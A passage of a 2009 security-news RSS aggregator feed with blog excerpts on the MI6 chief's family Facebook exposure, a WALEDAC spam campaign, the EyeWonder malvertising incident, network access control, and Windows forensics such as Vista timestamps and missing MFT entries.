&lt;a href="http://feeds.feedburner.com/~ff/AmbersailSecNews?a=JKEi8-GxF-o:fXCiW6fTJc8:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/AmbersailSecNews?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/AmbersailSecNews?a=JKEi8-GxF-o:fXCiW6fTJc8:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/AmbersailSecNews?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description>
</item>
<item>
<title>Facebook, Mail on Sunday and Sir John Sawers incoming Chief of the Secret Intelligence Service MI6</title>
<guid>http://p10.hostingprod.com/@spyblog.org.uk/blog/2009/07/facebook-mail-on-sunday-and-sir-john-sawers-incoming-chief-of-the-secret-intelli.html</guid>
<link>http://p10.hostingprod.com/@spyblog.org.uk/blog/2009/07/facebook-mail-on-sunday-and-sir-john-sawers-incoming-chief-of-the-secret-intelli.html</link>
<pubDate>Sun, 05 Jul 2009 13:04:54 +0100</pubDate>
<description>&lt;p&gt;The Mail on Sunday has another exclusive story about an aspect of data privacy and security, which are two sides of the same coin:&lt;br /&gt;
 &lt;br /&gt;
&lt;blockquote&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="http://www.mailonsunday.co.uk/news/article-1197562/MI6-chief-blows-cover-wifes-Facebook-account-reveals-family-holidays-showbiz-friends-links-David-Irving.html" target="_mos" title="Mail on Sunday - MI6 chief blows his cover as wife's Facebook account reveals family holidays, showbiz friends and links to David Irving - new window"&gt;MI6 chief blows his cover as wife's Facebook account reveals family holidays, showbiz friends and links to David Irving&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;By Jason Lewis&lt;br /&gt;
Last updated at 11:43 AM on 05th July 2009&lt;/p&gt;

&lt;p&gt;The new head of MI6 has been left exposed by a major personal security breach after his wife published intimate photographs and family details on the Facebook website.&lt;/p&gt;

&lt;p&gt;Sir John Sawers is due to take over as chief of the Secret Intelligence Service in November, putting him in charge of all Britain's spying operations abroad.&lt;/p&gt;

&lt;p&gt;But his wife's entries on the social networking site have exposed potentially compromising details about where they live and work, who their friends are and where they spend their holidays.&lt;/p&gt;

&lt;p&gt;Amazingly, she had put virtually no privacy protection on her account, making it visible to any of the site's 200million users who chose to be in the open-access 'London' network - regardless of where in the world they actually were.&lt;/p&gt;

&lt;p&gt;There are fears that the hugely embarrassing blunder may have compromised the safety of Sir John's family and friends.&lt;/p&gt;

&lt;p&gt;[...]&lt;/p&gt;

&lt;/blockquote&gt;

&lt;p&gt;Spy Blog does not often find itself in agreement with the creepy authoritarian NuLabour Foreign Secretary David Miliband, but his &lt;a href="http://news.bbc.co.uk/1/hi/uk/8134807.stm" target="_bbc" title="BBC - MI6 boss in Facebook entry row  - new window"&gt;comments via the BBC&lt;/a&gt; are, at one level true:&lt;/p&gt;

&lt;blockquote&gt;

&lt;p&gt;But Foreign Secretary David Miliband told the BBC's Andrew Marr programme: "Are you leading the news with that? The fact that there's a picture that the head of the MI6 goes swimming - wow, that really is exciting.&lt;/p&gt;

&lt;p&gt;"It is not a state secret that he wears Speedo swimming trunks, for goodness sake let's grow up. &lt;br /&gt;
&lt;/blockquote&gt;&lt;/p&gt;

&lt;p&gt;UPDATE - The BBC did Miliband yet another favour by making this quotation seem more coherent and pithy than it actually was in the video clip.&lt;/p&gt;

&lt;p&gt;This Sir John Sawers affair is reminiscent of the similar one about Alex Allan, Chairman of the Joint Intelligence Committee, when he was appointed back in November 2007:&lt;/p&gt;

&lt;p&gt;&lt;a href="&lt;br /&gt;
http://spyblog.org.uk/2007/11/alex-allan-is-now-chairman-of-the-joint-intelligence-committee-his-home-address-1.html" target="_sb1" title="Spy Blog - Alex Allan is now Chairman of the Joint Intelligence Committee - his home address, phone and mobile phone number are... - new window"&gt;Alex Allan is now Chairman of the Joint Intelligence Committee - his home address, phone and mobile phone number are...&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Is there nobody in Whitehall who bothers to check the world wide web for such personal details &lt;strong&gt;before&lt;/strong&gt; a new senior appointment is made ?&lt;/p&gt;

&lt;p&gt;Apart from the location details of the London flat, was there really anything sensitive from a security point of view ? Photos of his family and friends are inevitable, as he has been in the public eye as a very senior diplomat.&lt;/p&gt;

&lt;p&gt;Since he is currently still the UK's representative on the UN Security Council, and is living in New York, he would anyway probably be looking to move to a larger house or flat in London by November, when he takes up his post as Chief of the Secret Intelligence Service.&lt;/p&gt;

&lt;p&gt;If one were to be very cynical, one might suspect that by allowing your personal details to be revealed by members of your family via the web, it means that once you are appointed to a "sensitive" official position, you can then get the Government to foot the bill for a new house or apartment for "security" reasons. &lt;/p&gt;

&lt;p&gt;This Mail on Sunday story does, however, raise the same questions which we asked about their previous story about Assistant Commissioner Bob Quick / private hire cars business story back in December 2008:&lt;/p&gt;

&lt;p&gt;&lt;a href="http://spyblog.org.uk/2008/12/for-how-much-longer-will-the-uk-media-and-bloggers-be-able-to-freely-investigate.html" target="_sb2" title="Spy Blog - For how much longer will the UK media and bloggers be able to freely investigate stories like the Bob Quick anti-terrorist policeman / family wedding cars business story ? - new window"&gt;For how much longer will the UK media and bloggers be able to freely investigate stories like the Bob Quick anti-terrorist policeman / family wedding cars business story ?&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Were the Mail on Sunday or Facebook threatened by the Foreign Office or by MI6 etc. with the new &lt;/p&gt;

&lt;blockquote&gt;

&lt;p&gt;&lt;a href="http://www.opsi.gov.uk/acts/acts2008/ukpga_20080028_en_9#pt7-pb3-l1g76" target="_ta258a" title="text of Terrorism Act 2000 Section 58A - new window"&gt;58A Eliciting, publishing or communicating information about members of armed forces etc&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;(1) A person commits an offence who--&lt;/p&gt;

&lt;p&gt;(a) elicits or attempts to elicit information about an individual who &lt;strong&gt;is&lt;/strong&gt; or &lt;strong&gt;has been&lt;/strong&gt;--&lt;/p&gt;

&lt;p&gt;(i) a member of Her Majesty's forces,&lt;/p&gt;

&lt;p&gt;(ii)&lt;strong&gt; a member of any of the intelligence services&lt;/strong&gt;, or&lt;/p&gt;

&lt;p&gt;(iii) a constable,&lt;/p&gt;

&lt;p&gt;which is of a kind likely to be useful to a person committing or preparing an act of terrorism, or&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;(b) publishes or communicates any such information&lt;/strong&gt;.&lt;br /&gt;
&lt;/blockquote&gt;&lt;/p&gt;

&lt;p&gt;which is now fully in force ?&lt;/p&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/AmbersailSecNews?a=mmYFLn8X_iU:ZtYV0Eese2s:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/AmbersailSecNews?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/AmbersailSecNews?a=mmYFLn8X_iU:ZtYV0Eese2s:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/AmbersailSecNews?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description>
</item>
<item>
<title>XBox 360 Laptop Version 5</title>
<guid>http://hackedgadgets.com/?p=2522</guid>
<link>http://feedproxy.google.com/~r/HackedGadgets/~3/GFBBrc13v9Y/</link>
<pubDate>Sun, 05 Jul 2009 12:49:05 +0100</pubDate>
<category>Computer Hacks</category>
<description>
Ben Heck has just finished his latest hack which is version 5 of the XBox 360 Laptop. This time it looks even more polished than the previous versions. Unfortunately the laptop is spoken for so if you want one of these special units you may have to shell out some big bucks.
Via: Techeblog
"A few months [...]&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/AmbersailSecNews?a=4zt5fla70Po:EX4unVOkajk:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/AmbersailSecNews?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/AmbersailSecNews?a=4zt5fla70Po:EX4unVOkajk:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/AmbersailSecNews?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description>
</item>
<item>
<title>MI6 chief's wife puts security at risk on Facebook</title>
<guid>http://www.sophos.com/blogs/gc/?p=4562</guid>
<link>http://www.sophos.com/blogs/gc/g/2009/07/05/mi6-chiefs-wife-puts-security-risk-facebook/</link>
<pubDate>Sun, 05 Jul 2009 08:50:58 +0100</pubDate>
<category>Data leakage</category>
<description>According to media reports, the incoming head of the British Secret Intelligence Service (better known as MI6) has had personal information about himself and his family exposed on Facebook, after his wife's Facebook account was discovered to be potentially wide open for 200 million people to view.
The Mail on Sunday claims that the wife [...]&lt;div class="feedflare"&gt;
&lt;/div&gt;</description>
<enclosure url="http://podcasts.sophos.com/en/sophos-podcasts-019.mp3" length="9268379" type="audio/mpeg" />
</item>
<item>
<title>Generations Of Communications and How They Influence Business and Products</title>
<guid>tag:typepad.com,2003:post-6a00d83451e54d69e2011571b87541970b</guid>
<link>http://feedproxy.google.com/~r/Theconvergingnetwork/~3/uJPIgAwSRTI/generations-of-communications-and-how-they-influence-business-and-products.html</link>
<pubDate>Sun, 05 Jul 2009 07:57:26 +0100</pubDate>
<category>Product Bistro</category>
<description>Part 1: One of the reasons I enjoy creating software is that I'm fascinated by researching and understanding users of the technology we create. I sometimes refer to myself as a software anthropologist. That's part of why I also enjoy...&lt;div class="feedflare"&gt;
&lt;/div&gt;</description>
</item>
<item>
<title>How Important is an IP Address?</title>
<guid>http://www.computerdefense.org/?p=785</guid>
<link>http://feedproxy.google.com/~r/computerdefense/~3/LBzuTozy9gc/</link>
<pubDate>Sun, 05 Jul 2009 06:41:03 +0100</pubDate>
<category>IT</category>
<description>There's an interesting post on VitalSecurity.org by paperghost. He's talking about a feature in Gmail that allows you to see all IP Addresses logged into your Gmail account and even sign out all other users. He has two interesting thoughts in the article. That there's now a privacy concern if an attacker is in your [...]&lt;div class="feedflare"&gt;
&lt;/div&gt;</description>
</item>
<item>
<title>Some People Really Need to Look Into NAC</title>
<guid>http://www.infosecblog.org/2009/07/some-people-really-need-to-loo.html</guid>
<link>http://feedproxy.google.com/~r/RogersInfosecBlog/~3/3UV5yFqZ0PE/some-people-really-need-to-loo.html</link>
<pubDate>Sun, 05 Jul 2009 00:59:05 +0100</pubDate>
<category>NAC</category>
<description>&lt;p&gt;Over the weekend I was talking to someone who has a mandatory requirement at work to have their computer inspected by the helpdesk every 60 days.   If the computer is not inspected the computer is not allowed onto the network.&lt;/p&gt;

&lt;p&gt;I've heard of such requirements for remote users.   Remote users who don't connect to the company using a VPN are tough to check up on.   Requiring a periodic check-in could be a good idea for those users.   However, physically checking computers that are manageable devices on your internal company network seems like a waste of time to me.   If this story is accurate, I'd like to introduce them to NAC.  &lt;/p&gt;

&lt;p&gt;I know what you're saying.   First they are using a form of NAC if they can keep unapproved people off the network, and force them to go to the helpdesk to reauthorize themselves every 90 days.   Second, some people think of NAC like they think of PKI.   It just hasn't taken off yet and some people think it is one of the more useless "useful  technologies."&lt;/p&gt;

&lt;p&gt;NAC is actually useful for quite a bit more than keeping people off the network.   If you manually check computers every 60 days, a computer that has broken patching mechanisms or is infected will not be detected for an average of 30 days.   NAC would be able to detect this as the computer is connected to the network and on an ongoing recheck schedule.  Even if you don't want to send the user to a remediation page you could alert the helpdesk.   Better to be fixing known problems immediately than inconveniencing everyone else every 60 days.&lt;/p&gt;

&lt;p&gt;If you do have a NAC project, I'd suggest checking out Forescout.   I have been happy with our selection.   When we looked at other vendors it wasn't even close in my opinion.   Don't feel like you have to buy NAC from your network switch vendor or your desktop antivirus vendor.   &lt;/p&gt;&lt;div class="feedflare"&gt;
&lt;/div&gt;</description>
</item>
<item>
<title>Journalising, Journalism and Blogging…Restrictions on Posting</title>
<guid>http://beastorbuddha.com/?p=1728</guid>
<link>http://beastorbuddha.com/2009/07/05/journalising-journalism-and-bloggingrestrictions-on-posting/</link>
<pubDate>Sat, 04 Jul 2009 23:31:13 +0100</pubDate>
<category>Applications</category>
<description>I had a few comments sent to me about my last post. Some of the feedback: &amp;#8220;It wasn&amp;#8217;t inspirational&amp;#8221;, &amp;#8220;Its perspective wasn&amp;#8217;t that unique&amp;#8221;, &amp;#8220;What was the point?&amp;#8221; etc&amp;#8230;. All fair points. My only response is that at times, I will use Beast or Buddha as my journal to write about things that aren&amp;#8217;t necessarily [...]&lt;div class="feedflare"&gt;
&lt;/div&gt;</description>
</item>
<item>
<title>Interview with CTO of Fortinet, Michael Xie</title>
<guid>http://threatchaos.com/?p=942</guid>
<link>http://threatchaos.com/2009/07/interview-with-cto-of-fortinet-michael-xie/</link>
<pubDate>Sat, 04 Jul 2009 22:56:45 +0100</pubDate>
<category>Security</category>
<description>I was somewhat surprised by a position taken by Gartner at this past week&amp;#8217;s Security Summit at the Gaylord in Washington DC.  My surprise started with a blog post by Adam Hils and responses to my comments by Greg Young. From Gartner&amp;#8217;s viewpoint which is admittedly from the perspective of late adapters, the &amp;#8220;Next [...]&lt;div class="feedflare"&gt;
&lt;/div&gt;</description>
</item>
<item>
<title>Female looking for females to bunk with</title>
<guid>https://forum.defcon.org/showthread.php?t=10580</guid>
<link>https://forum.defcon.org/showthread.php?t=10580&amp;goto=newpost</link>
<pubDate>Sat, 04 Jul 2009 22:15:55 +0100</pubDate>
<category>Ride and Room Sharing</category>
<description>Unsure of days -- sort of depends on what I can find so far as lodging goes. So consider me flexible, there. 
 
Willing to crash on floors and pay my own way, just can't afford single occupancy these days. Would prefer to bunk with other females strictly, but if you have a dude (homo or hetero or...&lt;div class="feedflare"&gt;
&lt;/div&gt;</description>
</item>
<item>
<title>4th of July - discount</title>
<guid>http://www.memphis-computer-forensics.com/blog/?p=77</guid>
<link>http://www.memphis-computer-forensics.com/blog/2009/07/4th-of-july-discount/</link>
<pubDate>Sat, 04 Jul 2009 20:36:34 +0100</pubDate>
<category>Uncategorized</category>
<description>Today, whilst contemplating the birthday of the USA, I recalled that today is also the 2nd anniversary of the first time I ever worked forensics in the US.  For the 7 years before moving, I worked computer forensics for the Queensland Police Service in Australia, an agency with over 10,000 police officers and almost [...]&lt;div class="feedflare"&gt;
&lt;/div&gt;</description>
</item>
<item>
<title>Understanding China’s cyber threat perception</title>
<guid>http://www.thedarkvisitor.com/?p=1711</guid>
<link>http://feedproxy.google.com/~r/TheDarkVisitor/~3/_bKJZPdEx7Y/</link>
<pubDate>Sat, 04 Jul 2009 20:16:00 +0100</pubDate>
<category>Uncategorized</category>
<description>Nations develop defense capabilities and weapon systems based on threat perception. While it is extremely difficult to predict future war, it is something each country must take seriously. You don&amp;#8217;t spend all of your military budget on coastal defense if estimates show it is more likely you will engage in land warfare. If military decision-makers [...]&lt;div class="feedflare"&gt;
&lt;/div&gt;</description>
</item>
<item>
<title>HakShop back online</title>
<guid>http://www.hak5.org/?p=1290</guid>
<link>http://www.hak5.org/backstage/hakshop-back-online</link>
<pubDate>Sat, 04 Jul 2009 15:29:55 +0100</pubDate>
<category>Backstage</category>
<description>After nearly a week of downtime the HakShop is back online. Hooray!
On a personal note, I&amp;#8217;m done playing with e-commerce packages for a while. Everything I&amp;#8217;ve played with from ZenCart to Prestacart to Magento and ...&lt;div class="feedflare"&gt;
&lt;/div&gt;</description>
</item>
<item>
<title>Happy July 4th To Our American Cousins</title>
<guid>http://www.liquidmatrix.org/blog/?p=6604</guid>
<link>http://feedproxy.google.com/~r/Liquidmatrix/~3/SCCJsKGHIpU/</link>
<pubDate>Sat, 04 Jul 2009 14:51:03 +0100</pubDate>
<category>Administravia</category>
<description>Sarah Palin resigned providing for an inadvertent early holiday present. Now, as she goes off in search of a speech writer (she REALLY needs one), we would like to wish a very happy July 4th to our American cousins from all of us at Liquidmatrix Security Digest (well, the Canadian part of the gang). 
Enjoy!
Hmm. [...]&lt;div class="feedflare"&gt;
&lt;/div&gt;</description>
</item>
<item>
<title>WALEDAC celebrates Independence Day, too</title>
<guid>http://blog.trendmicro.com/?p=18236</guid>
<link>http://blog.trendmicro.com/waledac-celebrates-independence-day-too/</link>
<pubDate>Sat, 04 Jul 2009 14:13:56 +0100</pubDate>
<category>Malware</category>
<description>Holidays are almost always the target of significant spam and malware attacks, and this Fourth of July is turning out to be little different. A new WALEDAC variant &amp;#8211; detected as WORM_WALEDAC.DU &amp;#8211; has been sending out Independence Day spam messages. (In fact, last year there were multiple fourth of July attacks, one of which [...]&lt;p&gt;Post from: &lt;a href="http://blog.trendmicro.com"&gt;TrendLabs | Malware Blog - by Trend Micro&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="http://blog.trendmicro.com/waledac-celebrates-independence-day-too/"&gt;WALEDAC celebrates Independence Day, too&lt;/a&gt;&lt;/p&gt;&lt;div class="feedflare"&gt;
&lt;/div&gt;</description>
</item>
<item>
<title>HAPPY INDEPENDENCE DAY</title>
<guid>http://www.andyitguy.com/blog/?p=770</guid>
<link>http://www.andyitguy.com/blog/?p=770</link>
<pubDate>Sat, 04 Jul 2009 13:35:57 +0100</pubDate>
<category>Freedom</category>
<description>Just wanted to post a quick note to say “HAPPY BIRTHDAY AMERICA” and to say a BIG THANK YOU to all of you who have served America to ensure our freedom. Some of you served, or are serving, in the Armed Forces. Some have served in elected positions and some have served by giving [...]&lt;div class="feedflare"&gt;
&lt;/div&gt;</description>
</item>
<item>
<title>The Case of the Missing MFT Entry</title>
<guid>tag:blogger.com,1999:blog-9518042.post-9021061506103931754</guid>
<link>http://windowsir.blogspot.com/2009/07/case-of-missing-mft-entry.html</link>
<pubDate>Sat, 04 Jul 2009 13:24:00 +0100</pubDate>
<description>A bit ago, I received an email from someone mentioning the following facts with respect to an examination they were doing:&lt;br /&gt;&lt;br /&gt;- Malware was suspected as having been running at one point on a Windows XP SP2 system&lt;br /&gt;- A Prefetch file was found that related directly to the malware&lt;br /&gt;- AV logs indicated that the malware had been deleted&lt;br /&gt;- An XP Restore Point included an INI specific to the malware&lt;br /&gt;- Between the time that the malware had been deleted and the system imaged, 8 Restore Points were created&lt;br /&gt;&lt;br /&gt;Given these facts, the question was...why does there appear to be no MFT entry for the malware file?&lt;br /&gt;&lt;br /&gt;I responded with my answer...I want to know what YOU think.&lt;div class="feedflare"&gt;
&lt;/div&gt;</description>
</item>
<item>
<title>Vista Timestamps</title>
<guid>tag:blogger.com,1999:blog-6259255761169812061.post-7314987208638983953</guid>
<link>http://digfor.blogspot.com/2009/07/vista-timestamps.html</link>
<pubDate>Sat, 04 Jul 2009 10:39:00 +0100</pubDate>
<category>Forensic Analysis</category>
<description>Timestamps can certainly be tricky because of the many factors that can affect their accuracy. This fact however doesn’t automatically mean that file timestamps cannot be relied upon as evidence. This usually means that more work needs to be done by a forensic examiner to: &lt;ul&gt;&lt;li&gt;Correlate events from different sources.&lt;/li&gt;&lt;li&gt;Identify the factors leading to the timestamp changes.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;em&gt;Correlating events from different sources.&lt;/em&gt;&lt;/p&gt;&lt;p&gt;Some time ago I came across an &lt;a href="http://www.theengineer.co.uk/Articles/293454/Getting+the+picture.htm"&gt;article&lt;/a&gt; about the ‘selective enhancement’ method used to reconstruct a digital photograph from digital video footage. This method takes advantage of the fact that different frames are slightly different because the object moved or the light source changed. These differences are collected and then utilised in reconstructing the image. Now going back to digital forensics, correlating events involves the process of identifying alternative sources of evidence. Taken out of context, such evidence may be viewed as an irrelevant or insignificant detail in the presence of more weighty findings. Nevertheless, this kind of evidence may become crucial in reconstruction of events and is too important an area to neglect.&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;em&gt;Identify the factors leading to the timestamp changes.&lt;/em&gt;&lt;/p&gt;&lt;p&gt;There are many factors that can affect timestamps including, but not limited to, various scanning or indexing applications, changing the system clock, clock skew or using anti-forensic tools. 
Unless the application responsible for altering timestamps has been resident in memory for a long time, such applications are identifiable based on their execution time.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;Knowledge and experience play a critical role in the process of verifying the accuracy of timestamps. There are many publications available on the Internet that discuss timestamps and Vista timestamps in particular. You can find a link to these publications in my old &lt;a href="http://digfor.blogspot.com/2008/10/time-and-timestamps.html"&gt;post&lt;/a&gt;. Yet, there are several recent ‘white papers’ on the Internet that just can’t get Vista timestamps right.&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;em&gt;&lt;span style="font-size:85%;"&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem&lt;/span&gt;&lt;/em&gt;&lt;/li&gt;&lt;li&gt;&lt;em&gt;&lt;span style="font-size:85%;"&gt;Value Name: NtfsDisableLastAccessUpdate&lt;/span&gt;&lt;/em&gt;&lt;/li&gt;&lt;li&gt;&lt;em&gt;&lt;span style="font-size:85%;"&gt;Data Type: REG_DWORD (DWORD Value)&lt;/span&gt;&lt;/em&gt;&lt;/li&gt;&lt;li&gt;&lt;em&gt;&lt;span style="font-size:85%;"&gt;Value Data: set 1 to prevent the Last Access time stamp updates.&lt;/span&gt;&lt;/em&gt;&lt;/li&gt;&lt;/ul&gt;This doesn’t indicate that ‘Access Time’ would not be updated at all. By simply experimenting with a text file sitting on your (if you have Vista of course) desktop, you would be able to quickly determine that the ‘Access Time’ value &lt;span style="color:#ff0000;"&gt;doesn’t change&lt;/span&gt; on &lt;span style="color:#000099;"&gt;accessing&lt;/span&gt; or &lt;span style="color:#000099;"&gt;modifying&lt;/span&gt; the file. 
It will only change when you &lt;span style="color:#993300;"&gt;copy&lt;/span&gt; the file or &lt;span style="color:#993300;"&gt;move&lt;/span&gt; it to another volume.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_5b0OSbFi2M8/Sk8syVDD0FI/AAAAAAAAAPE/5T3DRpqHSTw/s1600-h/Access+Time+%28Vista%29.bmp"&gt;&lt;img style="WIDTH: 268px; HEIGHT: 106px; CURSOR: pointer" id="BLOGGER_PHOTO_ID_5354547725121867858" border="0" alt="" src="http://2.bp.blogspot.com/_5b0OSbFi2M8/Sk8syVDD0FI/AAAAAAAAAPE/5T3DRpqHSTw/s320/Access+Time+%28Vista%29.bmp" /&gt;&lt;/a&gt; &lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_5b0OSbFi2M8/Sk8syrtJGRI/AAAAAAAAAPM/gGq3kxasM-E/s1600-h/Access+Time+%28Vista%29+%282%29.bmp"&gt;&lt;img style="WIDTH: 251px; HEIGHT: 105px; CURSOR: pointer" id="BLOGGER_PHOTO_ID_5354547731203954962" border="0" alt="" src="http://1.bp.blogspot.com/_5b0OSbFi2M8/Sk8syrtJGRI/AAAAAAAAAPM/gGq3kxasM-E/s320/Access+Time+%28Vista%29+%282%29.bmp" /&gt;&lt;/a&gt;&lt;div class="feedflare"&gt;
&lt;/div&gt;</description>
</item>
<item>
<title>Va Pbaterff Nffrzoyrq, Whyl 4 1776</title>
<link>http://www.emergentchaos.com/archives/2009/07/va_pbaterff_nffrzoyrq_why.html</link>
<pubDate>Sat, 04 Jul 2009 08:46:44 +0100</pubDate>
<description>My &lt;a href="http://www.emergentchaos.com/archives/2008/07/in_congress_assembled_jul_2.html"&gt;usual&lt;/a&gt; &lt;a href="http://www.emergentchaos.com/archives/2007/07/in_congress_assembled_jul_1.html"&gt;celebration&lt;/a&gt; of &lt;a href="http://www.emergentchaos.com/archives/2006/07/in_congress_assembled_jul.html"&gt;Independence&lt;/a&gt; &lt;a href="http://www.emergentchaos.com/archives/2005/07/the_unanimous_d.html"&gt;day&lt;/a&gt; is to post, in its entirety, the Declaration of Independence.  It's very much worth reading, but this year, there's a little twist, from a delightful story starring Lawren Smithline and Robert Patterson, with a cameo by Thomas Jefferson.  Patterson sent Jefferson a letter which read, in part:
&lt;blockquote&gt;
&amp;ldquo;I shall conclude this paper with a specimen of such writing,&amp;rdquo; he boasted, &amp;ldquo;which I may safely defy the united ingenuity of the whole human race to decypher to the end of time&amp;#8230;.&amp;rdquo; 
&lt;/blockquote&gt;
&lt;div style="text-align:center;"&gt;&lt;img src="http://www.emergentchaos.com/images/09/july/patterson-enciphered-declaration.jpg" alt="patterson-enciphered-declaration.jpg" border="0" width="482" height="708" /&gt;&lt;/div&gt;
Well, perhaps it didn't last until the end of time, but the cipher apparently lasted until now, which is pretty darn good.

There's an article in 
&lt;a href="http://harvardmagazine.com/2009/07/jeffersons-conundrum"&gt;Harvard Magazine&lt;/a&gt;, and one in &lt;a href="http://www.americanscientist.org/my_amsci/restricted.aspx?act=pdf&amp;id=21622520666045"&gt;American Scientist&lt;/a&gt;, but it's behind a paywall.  Finally, the Wall St Journal has an article, which mentions, both without linking to either.
&lt;p&gt;
I think what I really like about this story is how a mathematician bothered to send his new ciphertext to the author of Virginia's statute on religious liberty (as our third President preferred to be remembered).  Having just finished Steven Johnson's very enjoyable "&lt;a href="http://www.amazon.com/Invention-Air-Steven-Johnson/dp/1594488525"&gt;The Invention of Air&lt;/a&gt;," I'm struck by how broadly engaged with science and the useful arts the founders were.  I think that sending an encrypted letter to President Obama would get you ... well, I don't really want to think about it, having just read the Declaration.
&lt;p&gt;&lt;div class="feedflare"&gt;
&lt;/div&gt;</description>
</item>
<item>
<title>Independence Day</title>
<guid>tag:blogger.com,1999:blog-8904768098307558342.post-1045103303493302021</guid>
<link>http://forensicphotoshop.blogspot.com/2009/07/independence-day.html</link>
<pubDate>Sat, 04 Jul 2009 08:01:00 +0100</pubDate>
<category>images from the DOD's defenselink</category>
<description>&lt;div class="feedflare"&gt;
&lt;/div&gt;</description>
</item>
<item>
<title>EC-Council Awarded More NSA CNSS Certifications</title>
<guid>1042@http://www.professionalsecuritytesters.org</guid>
<link>http://www.professionalsecuritytesters.org/modules.php?name=News&amp;file=article&amp;sid=1042</link>
<pubDate>Sat, 04 Jul 2009 04:42:22 +0100</pubDate>
<description>&lt;p&gt;EC-Council Awarded More NSA CNSS Certifications&lt;/p&gt;
&lt;p style="text-align: justify;"&gt;EC-Council Courseware for Certified Ethical Hacker (C|EH), Computer Hacking Forensics Investigator (C|HFI), Disaster Recovery Professional (E|DRP), Certified Security Analyst (E|CSA) and Licensed Penetration Tester (L|PT) Courseware has been certified at the highest national level by the Committee of National Security Systems (CNSS).&lt;/p&gt;
&lt;p style="text-align: justify;"&gt;The CNSS is a federal government entity under the U.S. Department of Defense that provides procedures and guidance for the protection of national security systems. The NSA certified these programs as meeting the CNSS 4012, 4013A, 4014, 4015 and 4016 training standards for information security professionals in the federal government.&lt;/p&gt;
&lt;p&gt;Read more &lt;a href="http://www.eccouncil.org/zone/r.aspx?u=/zone/content/File/CNSS2.pdf"&gt;HERE&lt;/a&gt;.&lt;/p&gt;&lt;div class="feedflare"&gt;
&lt;/div&gt;</description>
</item>
<item>
<title>Website Kidnapping</title>
<guid>http://1raindrop.typepad.com/1_raindrop/2009/07/website-kidnapping.html</guid>
<link>http://1raindrop.typepad.com/1_raindrop/2009/07/website-kidnapping.html</link>
<pubDate>Sat, 04 Jul 2009 04:30:14 +0100</pubDate>
<description>Who says business people don't understand security? The former marketing firm for Steak 'n Shake has executed a DoS: the Varnson Group is holding Steak n Shake's website hostage in a payment dispute. The Varnson Group signed a $4.36 million, 26-month contract in mid-November, with just over half of that to be paid in Steak n Shake stock. Steak n Shake terminated the deal in early February. The lawsuit filed by Steak n Shake March 3 in Indianapolis doesn’t go...&lt;div class="feedflare"&gt;
&lt;/div&gt;</description>
</item>
<item>
<title>EyeWonder malware incident affects popular web sites</title>
<link>http://blogs.zdnet.com/security/?p=3694</link>
<pubDate>Sat, 04 Jul 2009 01:09:29 +0100</pubDate>
<category>Web</category>
<description>During the last couple of hours, visitors to popular and highly trafficked web sites such as CNN, BBC, Washington Post, Gamespot, WorldOfWarcraft, Mashable, Chow.com, ITpro.co.uk, AndroidCommunity, Engadget and Chip.de started reporting that parts of the web sites are unreachable due to malware warnings appearing through the EyeWonder interactive digital advertising...&lt;div class="feedflare"&gt;
&lt;/div&gt;</description>
</item>
<item>
<title>img200.jpg [Flickr]</title>
<guid>tag:flickr.com,2005:/photo/3685159663</guid>
<link>http://www.flickr.com/photos/brianjo/3685159663/</link>
<pubDate>Sat, 04 Jul 2009 01:05:28 +0100</pubDate>
<category>phone</category>
<description>&lt;p&gt;&lt;a href="http://www.flickr.com/people/brianjo/"&gt;brianjo&lt;/a&gt; posted a photo:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.flickr.com/photos/brianjo/3685159663/" title="img200.jpg"&gt;&lt;img src="http://farm4.static.flickr.com/3623/3685159663_43f3db7618_m.jpg" width="240" height="192" alt="img200.jpg" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;div class="feedflare"&gt;
&lt;/div&gt;</description>
<enclosure url="http://farm4.static.flickr.com/3623/3685159663_43f3db7618_m.jpg" length="0" type="image/jpeg" />
</item>
</channel>
</rss>
